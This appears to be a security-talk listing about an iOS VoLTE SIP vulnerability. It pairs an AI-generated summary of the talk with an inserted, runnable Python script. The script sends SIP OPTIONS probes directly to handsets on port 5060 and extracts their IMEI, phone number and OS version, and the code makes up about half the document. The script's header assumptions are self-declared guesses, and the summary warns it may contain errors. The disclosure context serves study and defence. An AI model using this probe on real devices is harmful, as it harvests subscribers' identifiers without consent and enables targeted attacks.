Hackers of India

Hacking into iOS’s VOLTE implementation

By Hardik Mehta and Rajanish Pathak on 25 Aug 2023 @ HITB Sec Conf



Abstract

In this talk, we will be discussing a critical security vulnerability we discovered in the Voice over LTE (VoLTE) interface of iOS devices, including iPhones and Apple Watches.

This vulnerability has been present in the iOS operating system since the inception of 4G VoLTE. We will shed light on the issue, its root cause, and how it arises due to improper implementation of GSMA guidelines, highlighting a design flaw in the implementation of the iOS IMS SIP agent.

We will delve into the technical details of the vulnerability, providing a comprehensive analysis of its impact on iOS devices and the potential risks it poses to users’ privacy and security. We will also explore the challenges faced during the discovery and disclosure of the vulnerability to Apple and discuss the response and mitigation measures taken by the company.

AI Generated Summary (may contain errors)


The speakers describe how they found the vulnerability in the SIP (Session Initiation Protocol) component of iOS devices. Using nmap to sweep an operator's network for the SIP port, they found millions of iOS devices answering their probes. They then crafted a SIP request and sent it straight to those devices, which responded even though they were already registered with the IMS (IP Multimedia Subsystem). An attacker could therefore talk to a victim device directly, bypassing the IMS registration path, so the traffic left no trace at the network core and was hard to track or log.

From the responses the attacker could obtain sensitive information such as the IMEI, the MSISDN (phone number), and the iOS version, which could be used to select and profile targets for further attacks. Apple mitigated the issue by following the GSMA guidelines: the SIP agent no longer accepts unsolicited connections on port 5060, so only trusted incoming traffic from the IMS network is accepted.
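As an added illustration of the probe-and-parse flow described in the two paragraphs above (this is not the speakers' tooling and not code from the talk), the following Python script builds a SIP OPTIONS request aimed directly at a handset's port 5060, parses a constructed 200 OK, and extracts the kind of fields the talk says were exposed. Where those fields sit is an assumption drawn from GSMA/3GPP IMS conventions rather than a detail confirmed by the talk: the OS version in User-Agent, the IMEI as the urn:gsma:imei instance-ID URN in the Contact header's +sip.instance parameter, and the MSISDN as a tel: or sip: URI in P-Asserted-Identity, P-Preferred-Identity, Contact or From. The sample response and every number in it are constructed. The accept_incoming() function at the end models the fix the summary describes as a source-address allowlist; it is an assumption about the mechanism, not Apple's code.

```python
# Added example: SIP OPTIONS probe of an IMS SIP agent plus a model of the fix.
# Header locations, sample reply and trusted-peer check are assumptions (see lead-in).
import re
import socket
import uuid

SIP_PORT = 5060  # port the summary says the handset's IMS SIP agent listened on

# Assumption: IMEI is carried as the GSMA instance-ID URN (RFC 7254) in the
# Contact header's +sip.instance parameter, as the 3GPP/GSMA IMS profiles specify.
IMEI_URN = re.compile(r"urn:gsma:imei:(\d{8}-\d{6}-\d)")
# Assumption: the MSISDN appears as an E.164 number inside a tel: or sip: URI.
E164_URI = re.compile(r"(?:tel:|sip:)(\+\d{6,15})")


def build_options_probe(target_ip, source_ip, source_port=SIP_PORT):
    """Build a minimal RFC 3261 OPTIONS request addressed straight to the
    handset, i.e. not routed through the operator's IMS core."""
    branch = "z9hG4bK" + uuid.uuid4().hex[:16]
    tag = uuid.uuid4().hex[:8]
    call_id = uuid.uuid4().hex
    lines = [
        f"OPTIONS sip:{target_ip}:{SIP_PORT} SIP/2.0",
        f"Via: SIP/2.0/UDP {source_ip}:{source_port};branch={branch}",
        "Max-Forwards: 70",
        f"From: <sip:probe@{source_ip}>;tag={tag}",
        f"To: <sip:{target_ip}:{SIP_PORT}>",
        f"Call-ID: {call_id}@{source_ip}",
        "CSeq: 1 OPTIONS",
        f"Contact: <sip:probe@{source_ip}:{source_port}>",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_sip_response(raw):
    """Split a SIP message into its status code and a lower-cased header dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("utf-8", "replace")
    lines = head.split("\r\n")
    m = re.match(r"SIP/2\.0 (\d{3})", lines[0])
    status = int(m.group(1)) if m else None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status": status, "headers": headers}


def extract_identity(parsed):
    """Pull out the fields the talk says a probed handset gave away."""
    h = parsed["headers"]
    imei_match = IMEI_URN.search(h.get("contact", ""))
    msisdn = None
    for name in ("p-asserted-identity", "p-preferred-identity", "contact", "from"):
        m = E164_URI.search(h.get(name, ""))
        if m:
            msisdn = m.group(1)
            break
    return {
        "status": parsed["status"],
        "user_agent": h.get("user-agent"),
        "imei": imei_match.group(1) if imei_match else None,
        "msisdn": msisdn,
    }


def send_probe(target_ip, source_ip, timeout=2.0):
    """Send the probe over UDP and parse the reply (needs a reachable target)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_options_probe(target_ip, source_ip), (target_ip, SIP_PORT))
        try:
            data, _addr = s.recvfrom(65535)
        except socket.timeout:
            return None
    return parse_sip_response(data)


def accept_incoming(src_ip, trusted_peer_ips):
    """Model of the fix the summary describes (assumed mechanism): only traffic
    from the IMS peers the agent registered with is accepted; the rest is dropped."""
    return src_ip in trusted_peer_ips


# Constructed sample reply; every value in it is made up for illustration.
SAMPLE_RESPONSE = (
    b"SIP/2.0 200 OK\r\n"
    b"Via: SIP/2.0/UDP 10.0.0.2:5060;branch=z9hG4bKdeadbeef\r\n"
    b"From: <sip:probe@10.0.0.2>;tag=1a2b3c\r\n"
    b"To: <sip:10.0.0.7:5060>;tag=4d5e6f\r\n"
    b"Call-ID: abc123@10.0.0.2\r\n"
    b"CSeq: 1 OPTIONS\r\n"
    b"Contact: <sip:+15550001234@10.0.0.7:5060>;"
    b'+sip.instance="<urn:gsma:imei:35209900-000001-0>"\r\n'
    b"P-Preferred-Identity: <tel:+15550001234>\r\n"
    b"User-Agent: ExampleIMS/1.0 (iOS 15.1)\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print(extract_identity(parse_sip_response(SAMPLE_RESPONSE)))
    # Unsolicited probe from 10.0.0.2 is dropped; the registered IMS peer is accepted.
    print(accept_incoming("10.0.0.2", {"10.10.0.1"}), accept_incoming("10.10.0.1", {"10.10.0.1"}))
```

Run against the embedded sample it works offline; send_probe() only matters on a network where a SIP agent actually listens on 5060, and such probing should only be done against devices you are authorised to test.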

The disclosure timeline began with an initial report to Apple in March 2021. A first fix was shipped but the speakers were able to bypass it; a second fix, released in iOS 15.2, resolved the issue. The speakers stress that finding critical vulnerabilities like this one does not require advanced expertise and encourage others to look for similar issues.

Finally, the speakers mention that they have started fuzzing the SIP component to look for further vulnerabilities and intend to share those findings in future presentations.